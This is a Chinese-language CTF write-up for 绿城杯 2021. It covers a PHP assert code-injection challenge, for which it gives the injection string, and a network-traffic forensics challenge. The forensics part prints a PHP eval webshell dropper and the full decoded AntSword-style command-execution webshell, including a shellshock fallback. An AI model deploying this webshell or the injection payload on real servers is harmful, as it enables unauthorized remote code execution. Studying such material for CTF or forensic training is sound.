0%

绿城杯 2021

记录一下

Looking for treasure

defcon原题Nooode,直接用陆队这篇文章https://blog.zeddyu.info/2020/10/15/Defcon28final/#json-schemajson-schema方法的payload直接打就好了

image-20210929182624857

ezphp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
<!DOCTYPE html>
<!-- ... -->
<!--
<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li>
-->
<!-- ... -->
<?php require_once $file; ?>

把前面闭合后面注释即可

1
kawhi') or print_r(file_get_contents('./pages/flag.php'));//

流量分析

过滤php关键字,发现存在一些可疑的 POST 流量,像是LaravelCVE-2021-3129 漏洞流量的攻击特征

image-20210930114838099

我们提取出来之后把所有的A=00去掉然后再base64解密

image-20210930114815608

解密之后发现这么一段东西

1
echo <?php @eval(@gzinflate(base64_decode($_POST[14433])));?> > .config.php

往下找到一个压缩包

image-20211002205503936

而且后面的包有解压的操作

image-20211002205646996

我们需要在参数中找到解压的密码

1
2
3
4
5
6
import base64
import zlib
def decode_config_cmd(basestr):
return zlib.decompress(base64.b64decode(basestr),-zlib.MAX_WBITS)
print(decode_config_cmd('c0gtS8zRcEivysxLy0ksSdVISixONTOJT0lNzk9J1VCJD/APDomON6hIMzA1TzWwMExJs7CwiNXU1LQGAA=='))
#b'@eval(@gzinflate(base64_decode($_POST[_0xf057e081df888])));'

再把_0xf057e081df888参数的解码,得到代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr = preg_split("/;|:/", $opdir);
@array_push($oparr, $ocwd, sys_get_temp_dir());
foreach ($oparr as $item) {
if (!@is_writable($item)) {
continue;
}
$tmdir = $item . "/.fedd1";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($tmdir);
break;
}
}
function asenc($out)
{
return $out;
}
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "36" . "4f2";
echo @asenc($output);
echo "42" . "ff1";
}
ob_start();
try {
$p = base64_decode(substr($_POST["f861d394170244"], 2));
$s = base64_decode(substr($_POST["ufbd335828f30f"], 2));
$envstr = @base64_decode(substr($_POST["b430b310838a93"], 2));
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
if (substr($d, 0, 1) == "/") {
@putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
if (!empty($envstr)) {
$envarr = explode("|||asline|||", $envstr);
foreach ($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r = "{$p} {$c}";
function fe($f)
{
$d = explode(",", @ini_get("disable_functions"));
if (empty($d)) {
$d = array();
} else {
$d = array_map('trim', array_map('strtolower', $d));
}
return function_exists($f) && is_callable($f) && !in_array($f, $d);
}
function runshellshock($d, $c)
{
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; {$c} >{$tmp} 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print $output;
return True;
}
}
return False;
}
function runcmd($c)
{
$ret = 0;
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
if (fe('system')) {
@system($c, $ret);
} elseif (fe('passthru')) {
@passthru($c, $ret);
} elseif (fe('shell_exec')) {
print @shell_exec($c);
} elseif (fe('exec')) {
@exec($c, $o, $ret);
print join("\r\n", $o);
} elseif (fe('popen')) {
$fp = @popen($c, 'r');
while (!@feof($fp)) {
print @fgets($fp, 2048);
}
@pclose($fp);
} elseif (fe('proc_open')) {
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!@feof($io[1])) {
print @fgets($io[1], 2048);
}
while (!@feof($io[2])) {
print @fgets($io[2], 2048);
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
} elseif (fe('antsystem')) {
@antsystem($c);
} elseif (runshellshock($d, $c)) {
return $ret;
} elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
$w = new COM('WScript.shell');
$e = $w->exec($c);
$so = $e->StdOut();
$ret .= $so->ReadAll();
$se = $e->StdErr();
$ret .= $se->ReadAll();
print $ret;
} else {
$ret = 127;
}
return $ret;
}
$ret = @runcmd($r . " 2>&1");
print $ret != 0 ? "ret={$ret}" : "";
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
}
asoutput();
die;

主要看到这三句

1
2
3
4
<?php
$p = base64_decode(substr($_POST["f861d394170244"], 2));
$s = base64_decode(substr($_POST["ufbd335828f30f"], 2));
$envstr = @base64_decode(substr($_POST["b430b310838a93"], 2));

这里我们把前两位字符去掉,base64解码成功获取

1
cd /d "D:\\phpstudy_pro\\WWW\\secret"&"C:\Program Files\7-Zip\7z.exe" x secret.zip -pP4Uk6qkh6Gvqwg3y&echo 378df2c234&cd&echo fb7f8f

压缩包密码为P4Uk6qkh6Gvqwg3y